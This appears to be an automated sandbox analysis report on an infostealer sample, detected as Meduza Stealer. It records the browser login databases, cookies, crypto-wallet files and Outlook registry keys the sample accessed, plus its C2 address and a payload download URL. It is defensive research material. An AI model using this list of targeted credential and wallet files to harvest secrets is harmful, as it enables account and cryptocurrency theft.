Source: qflwedtkihuzyxlg.exe, 0000000E.00000002.2835428358.000001FB10D96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: KHg2NCkgWzIzLjAxXQpNb3ppbGxhIEZpcmVmb3ggKHg2NCBlbi1VUykgWzExOC4wLjFdCk1vemlsbGEgTWFpbnRlbmFuY2UgU2VydmljZSBbMTE4LjAuMV0KTWljcm9zb2Z0IE9mZmljZSBQcm9mZXNzaW9uYWwgUGx1cyAyMDE5IC0gZW4tdXMgWzE2LjAuMTY4MjcuMjAxMzBdCk1pY3Jvc29mdCBWaXN1YWwgQysrIDIwMjIgWDY0IEFkZGl0aW9uYWwgUnVudGltZSAtIDE0LjM2LjMyNTMyIFsxNC4zNi4zMjUzMl0KT2ZmaWNlIDE2IENsaWNrLXRvLVJ1biBMaWNlbnNpbmcgQ29tcG9uZW50IFsxNi4wLjE2ODI3LjIwMTMwXQpPZmZpY2UgMTYgQ2xpY2stdG8tUnVuIEV4dGVuc2liaWxpdHkgQ29tcG9uZW50IDY0LWJpdCBSZWdpc3RyYXRpb24gWzE2LjAuMTY4MjcuMjAwNTZdCkFkb2JlIEFjcm9iYXQgKDY0LWJpdCkgWzIzLjAwNi4yMDMyMF0KTWljcm9zb2Z0IFZpc3VhbCBDKysgMjAyMiBYNjQgTWluaW11bSBSdW50aW1lIC0gMTQuMzYuMzI1MzIgWzE0LjM2LjMyNTMyXQpHb29nbGUgQ2hyb21lIFsxMTcuMC41OTM4LjEzMl0KTWljcm9zb2Z0IEVkZ2UgWzExNy4wLjIwNDUuNDddCk1pY3Jvc29mdCBFZGdlIFVwZGF0ZSBbMS4zLjE3Ny4xMV0KTWljcm9zb2Z0IEVkZ2UgV2ViVmlldzIgUnVudGltZSBbMTE3LjAuMjA0NS40N10KSmF2YSBBdXRvIFVwZGF0ZXIgWzIuOC4zODEuOV0KSmF2YSA4IFVwZGF0ZSAzODEgWzguMC4zODEwLjldCk1pY3Jvc29mdCBWaXN1YWwgQysrIDIwMTUtMjAyMiBSZWRpc3RyaWJ1dGFibGUgKHg2NCkgLSAxNC4zNi4zMjUzMiBbMTQuMzYuMzI1MzIuMF0KT2ZmaWNlIDE2IENsaWNrLXRvLVJ1biBFeHRlbnNpYmlsaXR5IENvbXBvbmVudCBbMTYuMC4xNjgyNy4yMDEzMF0K
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2680683559.000001FB10DF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2680683559.000001FB10DF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2680683559.000001FB10DF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2680683559.000001FB10DF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2680683559.000001FB10DF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: powershell.exe, 00000005.00000002.2231709935.00007FF8490E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: sqlcolumnencryptionkeystoreprovider
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENT Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001 Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOCK Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: qflwedtkihuzyxlg.exe PID: 3524, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected CredGrabber
Source: Yara match File source: Process Memory Space: qflwedtkihuzyxlg.exe PID: 3524, type: MEMORYSTR
Yara detected Meduza Stealer
Source: Yara match File source: 0000000E.00000002.2835428358.000001FB10D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: qflwedtkihuzyxlg.exe PID: 3524, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1532355 Sample: OceanicTools.exe Startdate: 13/10/2024 Architecture: WINDOWS Score: 100 44 api.ipify.org 2->44 70 Suricata IDS alerts for network traffic 2->70 72 Found malware configuration 2->72 74 Malicious sample detected (through community Yara rule) 2->74 76 9 other signatures 2->76 10 OceanicTools.exe 3 2->10         started        signatures3 process4 dnsIp5 50 185.208.158.47, 49720, 80 SIMPLECARRER2IT Switzerland 10->50 40 C:\Users\user\...\qflwedtkihuzyxlg.exe, PE32+ 10->40 dropped 86 Suspicious powershell command line found 10->86 15 qflwedtkihuzyxlg.exe 1 10->15         started        19 powershell.exe 23 10->19         started        21 powershell.exe 23 10->21         started        23 3 other processes 10->23 file6 signatures7 process8 file9 42 C:\Users\user\...\qflwedtkihuzyxlg.exe:a.dll, PE32+ 15->42 dropped 52 Multi AV Scanner detection for dropped file 15->52 54 Creates files in alternative data streams (ADS) 15->54 56 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 15->56 64 3 other signatures 15->64 25 qflwedtkihuzyxlg.exe 5 7 15->25         started        58 Found many strings related to Crypto-Wallets (likely being stolen) 19->58 60 Found suspicious powershell code related to unpacking or dynamic code loading 19->60 62 Loading BitLocker PowerShell Module 19->62 29 conhost.exe 19->29         started        31 conhost.exe 21->31         started        signatures10 process11 dnsIp12 46 79.137.202.152, 15666, 49962 PSKSET-ASRU Russian Federation 25->46 48 api.ipify.org 104.26.13.205, 443, 49963 CLOUDFLARENETUS United States 25->48 78 Tries to steal Mail credentials (via file / registry access) 25->78 80 Found many strings related to Crypto-Wallets (likely being stolen) 25->80 82 Tries to harvest and steal browser information (history, passwords, etc) 25->82 84 Tries to harvest and steal Bitcoin Wallet information 25->84 33 cmd.exe 1 25->33         started        signatures13 process14 signatures15 66 Uses ping.exe to sleep 33->66 68 Uses ping.exe to check the status of other devices and networks 33->68 36 conhost.exe 33->36         started        38 PING.EXE 1 33->38         started        process16
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
79.137.202.152
 unknown Russian Federation
42569 PSKSET-ASRU true
104.26.13.205
 api.ipify.org United States
13335 CLOUDFLARENETUS false
185.208.158.47
 unknown Switzerland
34888 SIMPLECARRER2IT false

Contacted Domains

Name IP Active
api.ipify.org 104.26.13.205 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.208.158.47/phantomtoolsv2.exe false
    		unknown
    https://api.ipify.org/ false
    • URL Reputation: safe
    		 unknown